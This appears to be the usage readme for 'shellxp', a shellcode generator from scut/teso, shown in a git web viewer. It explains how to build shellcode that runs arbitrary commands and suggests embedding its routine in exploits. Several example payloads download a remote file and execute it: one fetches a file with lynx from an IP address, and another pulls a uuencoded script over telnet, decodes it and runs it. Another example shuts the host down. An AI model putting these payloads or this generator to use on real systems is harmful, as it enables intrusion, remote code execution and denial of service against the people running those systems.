blob: b6fbeaa176ac780e94627cdfa845d2f583e97520 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
gcc -o shellxp shellxp.c
./shellxp commands ...
or to exec the generated shellcode
./shellxp exec commands ...
either rip the sc_build routine into your exploits to directly create the
shellcode on the fly, or prepare it.
some examples:
./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
./shellxp /bin/sh -c "echo haha > /tmp/owned"
./shellxp /sbin/shutdown -h now
or especially fancy ;-)
./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh"
(where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file)
modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-)
(imagine some other fancy stuff in here :-)
...
-scut/teso.
to modify the shellcode, use:
gcc -o shellcode shellcode.c sc.s
./shellcode <-- will dump the code
./shellcode foo <-- will dump and run the code
|
